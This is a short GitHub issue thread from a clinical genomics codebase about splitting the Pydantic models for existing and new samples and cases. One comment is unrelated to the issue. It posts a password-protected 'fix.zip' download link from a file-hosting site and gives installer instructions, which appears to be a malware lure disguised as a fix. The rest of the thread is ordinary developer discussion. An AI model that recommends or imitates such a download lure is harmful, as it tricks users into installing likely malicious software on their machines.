### ISSUE TITLE
(Improve order flow)Add existing sample/case models and separate flows

### ISSUE THREAD

**Issue by islean** [Clinical-Genomics/cg#3649]
To get a cleaner flow, and to be able to mark required fields on new samples as required in the Pydantic models, we should split the models used for existing samples and cases.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by islean** [comment]
Solved in #3648
